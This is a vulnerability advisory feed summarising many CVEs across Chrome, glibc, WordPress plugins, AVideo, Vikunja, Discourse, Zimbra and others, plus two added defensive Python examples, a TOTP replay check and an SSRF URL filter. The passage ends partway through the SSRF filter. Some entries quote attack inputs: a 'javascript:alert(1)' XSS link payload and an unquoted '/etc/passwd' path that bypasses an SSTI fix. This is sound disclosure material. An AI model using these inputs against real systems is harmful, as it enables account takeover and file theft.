An out of bounds read vulnerability exists in the Blink rendering engine of Google Chrome prior to version 146.0.7680.153, allowing remote attackers to read memory outside intended buffer boundaries via a specially crafted HTML page. This vulnerability (CWE-125) has been classified as High severity by the Chromium security team and enables information disclosure attacks without requiring user interaction beyond visiting a malicious webpage. A vendor patch is available, and the vulnerability affects 9 Debian releases, indicating widespread downstream impact across Linux distributions.
Google
Buffer Overflow
Information Disclosure
Ubuntu
Debian
-
CVE-2026-4461
HIGH
CVSS 8.8
Heap corruption in Google Chrome's V8 engine prior to version 146.0.7680.153 enables remote code execution when users visit malicious websites, affecting Chrome, Ubuntu, and Debian systems. An unauthenticated attacker can craft a specially designed HTML page to trigger memory corruption and achieve complete system compromise without user interaction beyond visiting the page. A patch is available for immediate deployment.
Google
Information Disclosure
Ubuntu
Debian
Chrome
-
CVE-2026-4460
HIGH
CVSS 8.8
Memory disclosure in Google Chrome's Skia rendering engine prior to version 146.0.7680.153 enables unauthenticated attackers to read out-of-bounds memory contents by tricking users into visiting malicious web pages. Affected users across Chrome, Ubuntu, and Debian distributions face potential information leakage including sensitive data from process memory. A patch is available for immediate deployment.
Google
Buffer Overflow
Information Disclosure
Ubuntu
Debian
-
CVE-2026-4459
HIGH
CVSS 8.8
Heap corruption in Google Chrome's WebAudio component (versions prior to 146.0.7680.153) can be triggered through out-of-bounds memory access when processing malicious HTML pages, enabling remote attackers to achieve arbitrary code execution without user interaction beyond viewing the page. The vulnerability affects Chrome, Ubuntu, and Debian systems, with patches now available across all platforms.
Google
Information Disclosure
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4458
HIGH
CVSS 8.8
Heap memory corruption in Google Chrome prior to version 146.0.7680.153 can be triggered through malicious browser extensions, affecting Chrome users on Google, Ubuntu, and Debian systems. An attacker must convince a user to install a compromised extension to exploit this use-after-free vulnerability and potentially achieve code execution. A patch is available.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4457
HIGH
CVSS 8.8
Heap memory corruption in Google Chrome's V8 engine (versions prior to 146.0.7680.153) stems from type confusion vulnerabilities that can be triggered through malicious HTML pages without user privileges. An unauthenticated remote attacker can exploit this to achieve arbitrary code execution or crash the browser. The vulnerability affects Chrome, Ubuntu, and Debian systems, with patches now available.
Google
Memory Corruption
Information Disclosure
Ubuntu
Debian
-
CVE-2026-4456
HIGH
CVSS 8.8
A use-after-free vulnerability in Google Chrome's Digital Credentials API prior to version 146.0.7680.153 enables attackers with a compromised renderer process to escape the sandbox and potentially achieve code execution through a specially crafted HTML page. The vulnerability affects Chrome on multiple platforms including Ubuntu and Debian systems, requiring user interaction to trigger but presenting high impact across confidentiality, integrity, and availability. A patch is available in Chrome 146.0.7680.153 and later versions.
Denial Of Service
Google
Memory Corruption
Use After Free
Ubuntu
-
CVE-2026-4455
HIGH
CVSS 8.8
Heap buffer overflow in PDFium within Google Chrome versions prior to 146.0.7680.153 enables remote attackers to corrupt heap memory and potentially achieve code execution by delivering a malicious PDF file. The vulnerability requires user interaction to open the crafted PDF but no authentication or special privileges. Patches are available for affected Google Chrome, Ubuntu, and Debian systems.
Google
Buffer Overflow
Heap Overflow
Ubuntu
Debian
-
CVE-2026-4454
HIGH
CVSS 8.8
Heap memory corruption in Google Chrome versions prior to 146.0.7680.153 can be triggered through a use-after-free vulnerability in the Network component when a user visits a malicious HTML page. An unauthenticated remote attacker can exploit this to achieve arbitrary code execution with high integrity and confidentiality impact. A patch is available for Chrome, Ubuntu, and Debian users.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4452
HIGH
CVSS 8.8
Heap corruption in Google Chrome's ANGLE graphics library on Windows versions prior to 146.0.7680.153 can be triggered through integer overflow when processing maliciously crafted HTML pages. An unauthenticated remote attacker can exploit this vulnerability by deceiving users into visiting a malicious website, potentially achieving arbitrary code execution. A patch is available across affected platforms including Google Chrome, Microsoft Edge, and various Linux distributions.
Google
Microsoft
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4451
HIGH
CVSS 8.8
A renderer process sandbox escape vulnerability exists in Google Chrome prior to version 146.0.7680.153 due to insufficient input validation in the Navigation component. An attacker who has already compromised the renderer process can exploit this via a crafted HTML page to escape the sandbox and gain elevated privileges on the host system. A patch is available from Google, and the vulnerability is tracked in the EUVD database with High severity classification.
Google
Information Disclosure
Ubuntu
Debian
Chrome
-
CVE-2026-4450
HIGH
CVSS 8.8
Heap corruption in Google Chrome's V8 engine prior to version 146.0.7680.153 can be triggered through out-of-bounds memory writes when a user visits a malicious webpage. An unauthenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with high integrity and confidentiality impact. A security patch is available for affected users on Chrome, Ubuntu, and Debian systems.
Google
Memory Corruption
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4449
HIGH
CVSS 8.8
Heap memory corruption in Google Chrome's Blink rendering engine prior to version 146.0.7680.153 can be triggered through a malicious HTML page, potentially enabling remote code execution. An unauthenticated attacker requires only user interaction to exploit this use-after-free vulnerability across network boundaries. A patch is available for affected Chrome, Ubuntu, and Debian users.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4448
HIGH
CVSS 8.8
Heap buffer overflow in Google Chrome's ANGLE graphics library (versions prior to 146.0.7680.153) enables remote attackers to corrupt heap memory and potentially achieve arbitrary code execution through malicious HTML pages requiring only user interaction. The vulnerability affects Chrome on multiple platforms including Ubuntu and Debian systems. A patch is available and should be applied immediately given the high severity and attack accessibility.
Google
Heap Overflow
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4447
HIGH
CVSS 8.8
A sandbox escape vulnerability exists in Google Chrome's V8 JavaScript engine prior to version 146.0.7680.153, allowing remote attackers to execute arbitrary code within the Chrome sandbox through a crafted HTML page. This is a High severity issue affecting millions of Chrome users across Windows, macOS, and Linux platforms. The vulnerability is triggered via web-based attack vector (HTML page delivery) and does not require user interaction beyond visiting a malicious website.
RCE
Google
Ubuntu
Debian
Chrome
-
CVE-2026-4446
HIGH
CVSS 8.8
Heap corruption via use-after-free in Google Chrome's WebRTC implementation (versions prior to 146.0.7680.153) enables remote attackers to achieve arbitrary code execution through malicious HTML pages, requiring only user interaction. The vulnerability affects Chrome, Ubuntu, and Debian systems with a CVSS score of 8.8, though a patch is available.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4445
HIGH
CVSS 8.8
Heap memory corruption in Google Chrome's WebRTC implementation prior to version 146.0.7680.153 enables remote attackers to execute arbitrary code by tricking users into visiting malicious websites. The use-after-free vulnerability requires only user interaction and affects Chrome on multiple platforms including Ubuntu and Debian systems. A patch is available to address this high-severity flaw.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4444
HIGH
CVSS 8.8
Stack buffer overflow in Google Chrome's WebRTC implementation prior to version 146.0.7680.153 enables remote attackers to corrupt stack memory and achieve code execution through maliciously crafted HTML pages. The vulnerability affects Chrome, and potentially downstream products including Chromium-based browsers, requiring only user interaction and no authentication. A patch is available across affected platforms including Ubuntu and Debian.
Google
Buffer Overflow
Stack Overflow
Ubuntu
Debian
-
CVE-2026-4443
HIGH
CVSS 8.8
Sandboxed arbitrary code execution in Google Chrome's WebAudio component (versions prior to 146.0.7680.153) can be triggered remotely through malicious HTML, requiring only user interaction. An attacker can craft a weaponized webpage to break out of the Chrome sandbox and execute arbitrary code on affected systems. This high-severity vulnerability impacts Chrome, Ubuntu, and Debian users, with patches now available.
Google
Heap Overflow
RCE
Buffer Overflow
Ubuntu
-
CVE-2026-4442
HIGH
CVSS 8.8
Google Chrome versions prior to 146.0.7680.153 contain a heap buffer overflow in CSS parsing that enables remote code execution when users visit malicious HTML pages. An unauthenticated attacker can trigger heap memory corruption through a crafted webpage, potentially achieving arbitrary code execution with user privileges. A patch is available and should be applied immediately to all affected systems.
Google
Heap Overflow
Buffer Overflow
Ubuntu
Debian
-
CVE-2026-4441
HIGH
CVSS 8.8
Heap corruption in Google Chrome versions before 146.0.7680.153 results from a use-after-free vulnerability in the Base component, enabling remote attackers to execute arbitrary code through malicious HTML pages. The attack requires user interaction but no authentication, affecting Chrome on multiple platforms including Linux distributions. A patch is available to remediate this critical-severity vulnerability.
Google
Use After Free
Memory Corruption
Denial Of Service
Ubuntu
-
CVE-2026-4440
HIGH
CVSS 8.8
This is a critical out-of-bounds read and write vulnerability in the WebGL implementation of Google Chrome prior to version 146.0.7680.153. The vulnerability allows a remote attacker to perform arbitrary memory read and write operations by crafting a malicious HTML page, potentially leading to information disclosure, code execution, or complete system compromise. The vulnerability affects multiple Debian releases and has been assigned ENISA EUVD ID EUVD-2026-13447; a vendor patch is available.
Google
Buffer Overflow
Memory Corruption
Ubuntu
Debian
-
CVE-2026-4439
HIGH
CVSS 8.8
Out-of-bounds memory corruption in Google Chrome's WebGL implementation on Android prior to version 146.0.7680.153 enables remote attackers to escape the browser sandbox by delivering a malicious HTML page, requiring only user interaction. This critical vulnerability affects Chrome users on Android devices and could lead to complete system compromise if successfully exploited. A patch is available in Chrome 146.0.7680.153 and later versions.
Google
Buffer Overflow
Memory Corruption
Ubuntu
Debian
-
CVE-2026-4437
HIGH
CVSS 7.5
A DNS response parsing vulnerability exists in the GNU C Library (glibc) versions 2.34 through 2.43 affecting the gethostbyaddr and gethostbyaddr_r functions. When a malicious or compromised DNS server returns a crafted response that violates the DNS specification, the library may incorrectly treat non-answer sections (such as authority or additional sections) as valid answers, leading to buffer overflow and information disclosure. The vulnerability is classified as a read buffer over-read (CWE-125) and does not currently have a published CVSS score, EPSS metric, or confirmed KEV status, though the underlying mechanism suggests moderate real-world risk in environments with untrusted or attacker-controlled DNS infrastructure.
Information Disclosure
Buffer Overflow
-
CVE-2026-4434
HIGH
CVSS 8.1
Devolutions Server contains an improper certificate validation vulnerability in its PAM propagation WinRM connections that allows network attackers to conduct man-in-the-middle (MITM) attacks by exploiting disabled TLS certificate verification. This vulnerability affects Devolutions Server versions prior to 2026.1, enabling attackers positioned on the network path to intercept and manipulate WinRM communications without detection. The vulnerability is classified under CWE-295 (Improper Certificate Validation) and carries significant information disclosure and server compromise risks, particularly in environments where PAM propagation relies on WinRM for credential delivery and privileged session management.
Information Disclosure
-
CVE-2026-3368
HIGH
CVSS 7.2
The Injection Guard plugin for WordPress versions up to 1.2.9 contains a stored cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to inject malicious JavaScript into the admin log interface. The flaw stems from insufficient sanitization of query parameter names, which are logged and later rendered without proper output escaping when administrators view the plugin's log page. This enables arbitrary script execution in the context of an authenticated administrator's browser session, potentially leading to account compromise or further malicious actions.
WordPress
PHP
XSS
-
CVE-2026-2378
HIGH
CVSS 7.4
ArcSearch for Android versions prior to 1.12.7 contains an address bar spoofing vulnerability that allows attackers to display a different domain in the browser's address bar than the actual content being rendered. Users of ArcSearch for Android prior to version 1.12.7 are affected, and an attacker can craft malicious web content that, after user interaction, deceives users into believing they are visiting a legitimate domain while viewing attacker-controlled content. There is no indication of active exploitation in KEV data, and EPSS data is not provided.
XSS
Google
Android
-
CVE-2026-0677
HIGH
CVSS 7.2
This is a deserialization of untrusted data vulnerability (PHP Object Injection) in the TotalContest Lite WordPress plugin that allows authenticated attackers with high-level privileges to inject arbitrary PHP objects. The vulnerability affects all versions through 2.9.1 of the TotalContest Lite plugin from TotalSuite. With a CVSS score of 7.2, successful exploitation can lead to high impact on confidentiality, integrity, and availability of the affected system.
Deserialization
-
CVE-2025-67260
HIGH
CVSS 8.8
A file upload vulnerability exists in multiple Terrapack software components from ASTER TEC / ASTER S.p.A. that permits remote code execution when attackers upload malicious files. The affected products include Terrapack TkWebCoreNG version 1.0.20200914, Terrapack TKServerCGI version 2.5.4.150, and Terrapack TpkWebGIS Client version 1.0.0. Proof-of-concept code is available in public repositories, and the vulnerability enables arbitrary code execution on affected systems.
RCE
File Upload
-
CVE-2025-63261
HIGH
CVSS 7.8
AWStats 8.0 contains a command injection vulnerability in the open function that allows attackers to execute arbitrary system commands. The vulnerability affects the AWStats web analytics application, and attackers can exploit this flaw to achieve remote code execution on systems running vulnerable versions. A proof-of-concept has been documented in the referenced pentest-tools PDF, indicating practical exploitability.
Command Injection
-
CVE-2025-62846
HIGH
CVSS 7.3
An SQL injection vulnerability exists in QNAP QuRouter that allows authenticated local administrators to execute unauthorized code or commands through SQL injection techniques. The vulnerability affects QuRouter versions prior to 2.6.2.007, and exploitation requires an attacker to first obtain legitimate administrator credentials on the affected device. While no CVSS score or EPSS data is currently published, the SQL injection classification (CWE-89) combined with code execution impact represents a critical risk for compromised administrator accounts.
SQLi
RCE
Privilege Escalation
Qurouter
-
CVE-2025-55988
HIGH
CVSS 7.2
A path traversal vulnerability (CVSS 7.2) exists in the /Controllers/RestController.php component of DreamFactory Core. Rated high severity, it requires prompt remediation.
PHP
Path Traversal
-
CVE-2025-46597
HIGH
CVSS 7.5
Bitcoin Core versions 0.13.0 through 29.x contain an integer overflow vulnerability that could allow attackers to trigger unexpected behavior or crashes in affected nodes. This vulnerability affects a wide range of Bitcoin Core deployments spanning multiple major versions. While specific exploitation details remain limited due to the disclosure date and incomplete CVSS scoring, the integer overflow classification suggests potential for denial of service or memory corruption under specific conditions.
Integer Overflow
Buffer Overflow
-
CVE-2025-15608
HIGH
CVSS 7.7
A stack-based buffer overflow vulnerability exists in TP-Link AX53 v1 due to insufficient input sanitization in the device's probe handling logic, allowing unauthenticated remote attackers to cause denial of service through repeated service crashes and potentially achieve remote code execution via heap-spray techniques under specific conditions. The vulnerability affects TP-Link AX53 v1 devices and has a patch available from the vendor, though no confirmed active exploitation or public proof-of-concept has been widely reported at this time.
RCE
Buffer Overflow
Stack Overflow
-
CVE-2025-15607
HIGH
CVSS 7.3
A command injection vulnerability exists in TP-Link AX53 v1 devices within the mscd debug functionality that allows authenticated attackers to execute arbitrary commands with full device control. The vulnerability stems from insufficient input validation on log redirection parameters, which can be abused to concatenate unvalidated file content into shell commands. A vendor patch is available, and this represents a critical control-plane compromise vector for affected router devices.
Command Injection
-
CVE-2024-32537
HIGH
CVSS 7.1
Cross-Site Request Forgery (CSRF) vulnerability in joshuae1974 Flash Video Player allows Cross Site Request Forgery. Versions up to 0.4 are affected. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable with no authentication required and low attack complexity. No vendor patch is available.
CSRF
-
CVE-2026-33501
MEDIUM
CVSS 5.3
An unauthenticated information disclosure vulnerability exists in the AVideo Permissions plugin endpoint `list.json.php`, which exposes the complete permission matrix mapping user groups to installed plugins without any authentication check. The vulnerability affects AVideo instances with the Permissions plugin enabled and allows unauthenticated attackers to enumerate all user groups, plugins, and their permission assignments, information that significantly aids targeted privilege escalation attacks. A proof-of-concept curl command exists, and this represents a clear authentication bypass in a sensitive administrative endpoint.
PHP
Authentication Bypass
Privilege Escalation
-
CVE-2026-33500
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability exists in AVideo's comment markdown processing, where the fix for a prior XSS issue (CVE-2026-27568) inadvertently disabled Parsedown's safe mode while implementing incomplete custom sanitization. An attacker with comment posting privileges can inject malicious JavaScript via markdown link syntax (e.g., `[text](javascript:alert(1))`) that executes in the browser context of any user viewing the comment, enabling session hijacking and account takeover. A working proof-of-concept exists and the vulnerability affects all versions of WWBN AVideo using the vulnerable ParsedownSafeWithLinks class (pkg:composer/wwbn_avideo).
PHP
XSS
-
CVE-2026-33499
MEDIUM
CVSS 6.1
AVideo contains a reflected cross-site scripting (XSS) vulnerability in the password unlock functionality where the unlockPassword request parameter is directly reflected into HTML input tag attributes without output encoding. The vulnerability affects AVideo (pkg:composer/wwbn_avideo) and can be exploited by any unauthenticated attacker to execute arbitrary JavaScript in the victim's browser with no user interaction beyond clicking a crafted link, potentially leading to session hijacking, account takeover, or credential theft. A proof-of-concept has been published and the vulnerability is documented in the official GitHub advisory.
PHP
XSS
-
CVE-2026-33495
MEDIUM
CVSS 6.5
Ory Oathkeeper improperly trusts the X-Forwarded-Proto header regardless of the serve.proxy.trust_forwarded_headers configuration setting, allowing attackers to bypass protocol-based access controls. This affects deployments of pkg:go/github.com_ory_oathkeeper where distinct HTTP and HTTPS rules are configured, enabling an attacker to craft requests with spoofed X-Forwarded-Proto headers to trigger unintended authorization rules. A vendor patch is available and exploitation requires specific preconditions (protocol-differentiated rules and ability to trigger one rule but not the other), limiting real-world impact despite the CVSS 6.5 score.
Authentication Bypass
-
CVE-2026-33481
MEDIUM
CVSS 5.3
Syft versions before v1.42.3 fail to properly clean up temporary files when temporary storage becomes exhausted during archive scanning, allowing an attacker to trigger a denial of service by exhausting the system's temporary storage through highly compressed or large artifacts. This affects all users of Syft who scan untrusted or adversarially-crafted archives, as the vulnerability requires no authentication and can be triggered remotely through the normal scanning interface. The vulnerability has been patched in v1.42.3 and no active exploitation has been reported in the wild, though the attack vector is straightforward and does not require special privileges.
Denial Of Service
-
CVE-2026-33474
MEDIUM
CVSS 6.5
An unbounded image decoding and resizing vulnerability in Vikunja's task attachment preview generation allows authenticated attackers to exhaust server CPU and memory by uploading highly compressed but extremely large-dimension images. The vulnerability affects Vikunja API versions with task attachments enabled, and a proof-of-concept script demonstrates that a 10,000×10,000 PNG (~284 KB on disk) can expand to ~100M pixels in memory during decode, causing significant latency and potential denial of service. Multiple concurrent preview requests across different attachments can degrade or crash the service; the CVSS 6.5 rating reflects high availability impact from a low-privileged, network-reachable attacker.
Denial Of Service
-
CVE-2026-33473
MEDIUM
CVSS 5.7
A time-based one-time password (TOTP) reuse vulnerability exists in Vikunja's authentication implementation where a valid TOTP code can be used multiple times within its 30-second validity window, allowing an attacker who captures or obtains a valid code to authenticate as a targeted user. This affects all users who have enabled two-factor authentication (2FA) on Vikunja instances, and while the CVSS score of 5.7 reflects moderate severity, the vulnerability undermines a critical layer of the defense-in-depth authentication model. A proof-of-concept demonstrating the reuse attack has been publicly disclosed.
Authentication Bypass
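Added example (not Vikunja's code, and not from the advisory): an RFC 6238 verifier in Python that shows the replay in `verify_naive` next to a hardened `verify` that records the highest time-step counter each user has already redeemed and refuses anything at or below it. The user name, secret and timestamps are constructed for the demo.

```python
import hashlib
import hmac
import struct

STEP = 30          # RFC 6238 time step in seconds
DIGITS = 6

# Constructed demo secret, not a real credential.
USER_SECRETS = {"alice": b"constructed-demo-secret-for-alice"}


def totp(secret: bytes, counter: int) -> str:
    """RFC 6238 TOTP over HMAC-SHA1 for one time-step counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** DIGITS:0{DIGITS}d}"


class TotpVerifier:
    """Checks codes within +/-window steps of 'now'; verify() additionally blocks replays."""

    def __init__(self, secrets: dict, window: int = 1):
        self.secrets = secrets
        self.window = window
        self.last_counter = {}   # user -> highest time-step counter already redeemed

    def _matching_counter(self, user: str, code: str, now: float):
        counter = int(now // STEP)
        for c in range(counter - self.window, counter + self.window + 1):
            if hmac.compare_digest(totp(self.secrets[user], c), code):
                return c
        return None

    def verify_naive(self, user: str, code: str, now: float) -> bool:
        """Vulnerable: a valid code is accepted as often as it is presented inside its window."""
        return self._matching_counter(user, code, now) is not None

    def verify(self, user: str, code: str, now: float) -> bool:
        """Hardened: each time-step counter can be redeemed at most once per user."""
        c = self._matching_counter(user, code, now)
        if c is None:
            return False
        if c <= self.last_counter.get(user, -1):
            return False   # replay of a code (or an older step) that was already used
        self.last_counter[user] = c
        return True


if __name__ == "__main__":
    now = 1_700_000_000
    code = totp(USER_SECRETS["alice"], now // STEP)
    v = TotpVerifier(USER_SECRETS)
    print(v.verify("alice", code, now), v.verify("alice", code, now + 5))
```

In a real deployment the last-redeemed counter must live in the database (or another store shared by every app instance) and be updated under a lock or with a compare-and-set, otherwise two concurrent requests carrying the same code can both pass.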
-
CVE-2026-33429
MEDIUM
CVSS 6.3
An information disclosure vulnerability in Parse Server's LiveQuery functionality allows attackers to infer the values of protected fields by monitoring whether update events are generated when those fields change, effectively creating a binary oracle that reveals field modifications despite the field values themselves being stripped from event payloads. The vulnerability affects Parse Server npm package across multiple versions, and while no public exploit code or active exploitation has been documented, the attack requires only standard subscription capabilities without elevated privileges. The vendor has released patches that validate the watch parameter against protected fields at subscription time, mirroring existing where clause protections.
Information Disclosure
-
CVE-2026-33428
MEDIUM
CVSS 6.5
An authorization bypass vulnerability exists in Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, where non-staff users with elevated group membership can access deleted posts belonging to any user through an overly permissive authorization check on the deleted posts index endpoint. This is a CWE-863 (Incorrect Authorization) vulnerability that allows unauthorized information disclosure of deleted content. No public exploit or active exploitation in the wild has been reported, but patches are available and no workarounds exist.
Authentication Bypass
-
CVE-2026-33425
MEDIUM
CVSS 5.3
An information disclosure vulnerability in Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows unauthenticated attackers to enumerate private group membership by observing directory result changes when manipulating the exclude_groups parameter. This enables attackers to determine whether specific users are members of private groups without authentication, representing a direct privacy violation. The vulnerability does not appear to be actively exploited in the wild (no KEV status indicated), but patches are available from the vendor.
Information Disclosure
-
CVE-2026-33424
MEDIUM
CVSS 5.9
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an access control flaw (CWE-863, Incorrect Authorization) where a user who has lost direct access to a private message topic can still grant invites to it, letting them add further participants to a conversation they can no longer reach themselves. No public exploit code has been reported; patches are available across the supported release branches.
Authentication Bypass
-
CVE-2026-33411
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability exists in Discourse's solved posts stream feature where unsanitized topic titles can be persisted and executed in the browser context of authenticated users. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, allowing authenticated attackers to inject malicious JavaScript that executes in the browsers of other users viewing the affected topics. The CVSS score of 5.4 reflects low confidentiality and integrity impact with no availability impact; exploitation requires an attacker with the privileges to set the topic title and a victim who views the affected stream.
XSS
-
CVE-2026-33372
MEDIUM
CVSS 5.4
Zimbra Collaboration Server 10.0 and 10.1 accept CSRF tokens from request bodies instead of enforcing header-based validation, allowing attackers to perform unauthorized actions by deceiving authenticated users into submitting malicious requests. This CSRF bypass affects webmail users and could enable account compromise or sensitive data modification without user awareness. No patch is currently available.
CSRF
-
CVE-2026-33371
MEDIUM
CVSS 4.3
An XML External Entity (XXE) vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Exchange Web Services (EWS) SOAP interface due to improper XML input handling. An authenticated attacker can submit crafted XML payloads to a parser with external entity resolution enabled, potentially disclosing sensitive local files from the server. Beyond the CVSS 4.3 rating, no EPSS data or known exploitation-in-the-wild status is currently available, though the vulnerability has been documented in Zimbra's security advisory system.
XXE
-
CVE-2026-33370
MEDIUM
CVSS 6.1
A stored cross-site scripting (XSS) vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Briefcase feature, caused by insufficient sanitization of uploaded file types. When an attacker crafts a malicious file and shares it via the Briefcase public sharing mechanism, the embedded JavaScript executes in the victim's browser session context when the file is opened, enabling arbitrary script execution, session hijacking, credential theft, and unauthorized actions on behalf of the victim. Beyond the CVSS 6.1 rating, no EPSS data or KEV listing is currently available; the attack vector is network-based with low complexity and requires user interaction (opening the shared file).
XSS
-
CVE-2026-33369
MEDIUM
CVSS 4.3
An LDAP injection vulnerability exists in Zimbra Collaboration Server (ZCS) versions 10.0 and 10.1 within the Mailbox SOAP service's FolderAction operation. An authenticated attacker can exploit this issue by sending a crafted SOAP request containing malicious LDAP filter syntax to bypass input validation and retrieve sensitive directory attributes from the LDAP backend. This vulnerability enables information disclosure of directory data that should be access-controlled.
Information Disclosure
-
CVE-2026-33368
MEDIUM
CVSS 6.1
A reflected cross-site scripting (XSS) vulnerability exists in the Zimbra Collaboration Suite (ZCS) Classic Webmail REST interface (/h/rest) affecting versions 10.0 and 10.1, allowing unauthenticated attackers to inject malicious JavaScript via crafted URLs. When a victim accesses the malicious link, the injected script executes within the Zimbra webmail application context, enabling the attacker to perform unauthorized actions on behalf of the victim such as reading emails, modifying settings, or sending messages. No EPSS probability or public exploit code is currently documented in the available intelligence sources, though the vulnerability is listed in the Zimbra 10.1.16 security fixes, indicating a patch has been made available.
XSS
-
CVE-2026-33343
MEDIUM
CVSS 5.9
An authenticated user with restricted RBAC permissions on specific key ranges in etcd can use nested transactions to completely bypass key-level authorization controls and access the entire etcd data store. This affects etcd versions 3.4.x before 3.4.42, 3.5.x before 3.5.28, and 3.6.x before 3.6.9. While Kubernetes deployments are typically protected because Kubernetes handles authentication and authorization at the API server layer rather than relying on etcd's built-in controls, direct etcd deployments with RBAC restrictions are at significant risk.
Kubernetes
Authentication Bypass
-
CVE-2026-33315
MEDIUM
CVSS 4.3
The Vikunja todo application contains an authentication bypass vulnerability in its CalDAV endpoint that allows attackers to circumvent two-factor authentication (2FA) protections by using basic HTTP authentication. An attacker with valid username and password credentials can access CalDAV endpoints without providing a TOTP token, gaining unauthorized access to protected project information including names, descriptions, and task details. A proof-of-concept exploit has been publicly documented, and patches are available from the vendor.
Authentication Bypass
-
CVE-2026-33313
MEDIUM
CVSS 4.3
An authenticated user in Vikunja can read any task comment by its ID without proper authorization checks, regardless of whether they have access to the task that comment belongs to. The vulnerability exists in the `GET /api/v1/tasks/{taskID}/comments/{commentID}` endpoint, which validates access against the attacker-controlled task ID in the URL but then loads the comment by ID alone, bypassing task ownership verification. Any authenticated attacker with read access to at least one task can enumerate and retrieve comments from arbitrary tasks and private projects, leading to unauthorized information disclosure.
Authentication Bypass
-
CVE-2026-33312
MEDIUM
CVSS 5.4
A permission-check bypass vulnerability exists in Vikunja versions 0.20.2 through 2.1.x where the DELETE /api/v1/projects/:project/background endpoint incorrectly validates CanRead permissions instead of CanUpdate permissions, allowing read-only project members to permanently delete a project's background image. This affects the go-vikunja:vikunja product family, and the vulnerability has been patched in version 2.2.0 as documented in the GitHub security advisory GHSA-564f-wx8x-878h.
Authentication Bypass
-
CVE-2026-33291
MEDIUM
CVSS 5.4
A broken access control vulnerability in Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows moderators to create Zendesk support tickets for topics they lack permission to view, bypassing intended access restrictions. This affects all Discourse forums utilizing the Zendesk plugin integration. The vulnerability is classified as CWE-863 (Incorrect Authorization) and has no publicly disclosed active exploitation or proof-of-concept code, though patches are available from the vendor.
Authentication Bypass
-
CVE-2026-33251
MEDIUM
CVSS 5.4
An authorization bypass vulnerability in Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 allows authenticated users to accept or unaccept solutions in hidden Solved topics without proper authorization checks. The vulnerability affects the open-source Discourse discussion platform and permits users with valid credentials to manipulate solution status across topics they should not have access to, resulting in information disclosure and integrity violations. This is a low-to-moderate severity issue with a CVSS score of 5.4 that requires prior authentication but carries exploitation risk in multi-tenant Discourse installations.
Authentication Bypass
-
CVE-2026-33179
MEDIUM
CVSS 5.5
libfuse versions 3.18.0 through 3.18.1 contain a NULL pointer dereference and memory leak vulnerability in the fuse_uring_init_queue function that affects only the io_uring transport implementation. A local user with low privileges can trigger this vulnerability to crash the FUSE daemon or exhaust system resources through repeated exploitation. A proof-of-concept has been confirmed with AddressSanitizer and LeakSanitizer, demonstrating both the NULL dereference condition and memory leak when numa_alloc_local or fuse_uring_register_queue fail.
Denial Of Service
Null Pointer Dereference
-
CVE-2026-33165
MEDIUM
CVSS 5.5
A remote code execution vulnerability in libde265 (CVSS 5.5). Remediation should follow standard vulnerability management procedures.
Memory Corruption
Buffer Overflow
-
CVE-2026-33144
MEDIUM
CVSS 5.8
Heap-based buffer overflow in GPAC MP4Box's XML parsing function allows local attackers to corrupt memory and potentially crash the application or achieve code execution by crafting malicious NHML files with specially formatted BitSequence elements. The vulnerability affects systems processing untrusted multimedia files and remains unpatched as of this advisory. Exploitation requires user interaction to open a malicious file.
Memory Corruption
Buffer Overflow
-
CVE-2026-33130
MEDIUM
CVSS 6.5
Uptime Kuma versions 1.23.0 through 2.2.0 contain an incomplete Server-Side Template Injection (SSTI) vulnerability in the LiquidJS templating engine that allows authenticated attackers to read arbitrary files from the server. A prior fix (GHSA-vffh-c9pq-4crh) attempted to restrict file path access through three mitigation options (root, relativeReference, dynamicPartials), but this fix only blocks quoted paths; attackers can bypass the mitigation by using unquoted absolute paths like /etc/passwd that successfully resolve through the require.resolve() fallback mechanism in liquid.node.js. The vulnerability requires low privileges (authenticated access) but can result in high confidentiality impact, making it a notable information disclosure risk for self-hosted monitoring deployments.
Node.js
Lfi
Code Injection
-
CVE-2026-33126
MEDIUM
CVSS 5.0
Frigate versions prior to 0.16.3 contain a Server-Side Request Forgery (SSRF) vulnerability in the /ffprobe endpoint that accepts arbitrary user-controlled URLs without proper validation. An authenticated attacker can leverage this endpoint to make HTTP requests to internal network resources, cloud metadata services (such as AWS IMDSv1), or perform reconnaissance activities like port scanning against systems accessible from the Frigate server. The vulnerability requires low privileges (authenticated user) and has a network attack vector with low complexity, making it moderately exploitable in environments where Frigate is exposed to untrusted users.
SSRF
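Added example, not Frigate's code: the kind of destination check a server-side probe such as `/ffprobe` needs before it touches a user-supplied URL. It restricts the scheme, resolves the host, rejects any answer in loopback, link-local (including the 169.254.169.254 metadata address), private or multicast ranges, unwraps IPv4-mapped IPv6 literals, and returns the resolved IPs so the caller can pin them. The resolver is injected and the DNS answers are constructed, so the check runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Address ranges a server-side fetcher must never be pointed at from user input.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
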